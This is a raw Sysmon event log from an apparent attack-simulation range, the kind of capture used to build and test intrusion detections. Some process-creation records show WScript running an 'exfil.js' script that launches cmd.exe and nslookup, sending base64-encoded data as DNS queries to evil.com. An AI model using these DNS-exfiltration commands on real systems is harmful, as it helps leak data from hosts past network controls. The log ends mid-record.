14:21:29.059{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.059{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-3F43-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.059{2E1864BB-18E0-629A-6742-000000005F02}39767340C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-3F43-000000005F02}1696C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.062{2E1864BB-18E9-629A-3F43-000000005F02}1696C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwzs.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.043{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkgmn.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.028{2E1864BB-18E9-629A-3D43-000000005F02}55448028C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-3E43-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.028{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.028{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.028{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.028{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.028{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-3E43-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.028{2E1864BB-18E9-629A-3C43-000000005F02}49365472C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-3E43-000000005F02}7616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.034{2E1864BB-18E9-629A-3E43-000000005F02}7616C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-3C43-000000005F02}4936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkgmn.tmp 2>&1 10341000x8000000000000000207980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.012{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-3D43-000000005F02}5544C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.012{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-3D43-000000005F02}5544C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.012{2E1864BB-18E9-629A-3D43-000000005F02}55448028C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-3C43-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.997{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-3D43-000000005F02}5544C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.997{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-3C43-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.997{2E1864BB-18E0-629A-6742-000000005F02}39766436C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-3C43-000000005F02}4936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.000{2E1864BB-18E9-629A-3C43-000000005F02}4936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkgmn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x800000000000000044797Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:29.002{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7FCDDAC0224026D415D32F3D45EBF08,SHA256=67C13B43A64B5D6476767F6B5E479A8BF0D647686B44D1601A9E5DE65D97B8BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.980{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8843-000000005F02}6848C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.980{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.980{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.980{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.980{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.980{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EA-629A-8743-000000005F02}7072C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 